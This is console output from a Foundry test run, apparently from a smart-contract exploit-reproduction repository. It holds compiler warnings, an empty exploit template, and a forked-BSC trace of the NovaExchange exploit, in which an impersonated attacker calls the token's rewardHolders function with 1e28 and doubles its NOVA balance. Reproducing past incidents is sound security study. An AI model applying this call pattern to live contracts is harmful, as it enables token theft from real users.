Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-12/NovaExchange_exp.sol:29:5:
   |
29 |     IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 525.14ms (1.70ms CPU time)

Ran 1 test for src/test/2022-12/NovaExchange_exp.sol:ContractTest
[PASS] testExploit() (gas: 34702)
Logs:
  Before exploit, NOVA balance of attacker:: 10000000000020000000000000000
  After exploit,  NOVA balance of attacker:: 20000000000020000000000000000

Traces:
  [5830] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 23749678 [2.374e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [34702] ContractTest::testExploit()
    ├─ [2886] 0xB5B27564D05Db32CF4F25813D35b6E6de9210941::balanceOf(0xCBF184b8156e1271449CFb42A7D0556A8DCFEf72) [staticcall]
    │   └─ ← [Return] 10000000000020000000000000000 [1e28]
    ├─ emit log_named_uint(key: "Before exploit, NOVA balance of attacker:", val: 10000000000020000000000000000 [1e28])
    ├─ [0] VM::prank(0xCBF184b8156e1271449CFb42A7D0556A8DCFEf72)
    │   └─ ← [Return]
    ├─ [11399] 0xB5B27564D05Db32CF4F25813D35b6E6de9210941::rewardHolders(10000000000000000000000000000 [1e28])
    │   ├─  storage changes:
    │   │   @ 0x43bb294d1120e845f948727c25a5f9f8e57439d4c6cce15b5dbb9b8f2916451a: 0x0000000000000000000000000000000000000000204fce5e3e6c1045ef820000 → 0x0000000000000000000000000000000000000000409f9cbc7c9112a6ff820000
    │   │   @ 10: 0x0000000000000000000000000000000000000000204fce5e3f8847d96d8a0000 → 0x0000000000000000000000000000000000000000409f9cbc7dad4a3a7d8a0000
    │   └─ ← [Stop]
    ├─ [886] 0xB5B27564D05Db32CF4F25813D35b6E6de9210941::balanceOf(0xCBF184b8156e1271449CFb42A7D0556A8DCFEf72) [staticcall]
    │   └─ ← [Return] 20000000000020000000000000000 [2e28]
    ├─ emit log_named_uint(key: "After exploit,  NOVA balance of attacker:", val: 20000000000020000000000000000 [2e28])
    ├─  storage changes:
    │   @ 10: 0x0000000000000000000000000000000000000000204fce5e3f8847d96d8a0000 → 0x0000000000000000000000000000000000000000409f9cbc7dad4a3a7d8a0000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.19s (950.78ms CPU time)

Ran 2 test suites in 2.21s (2.72s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
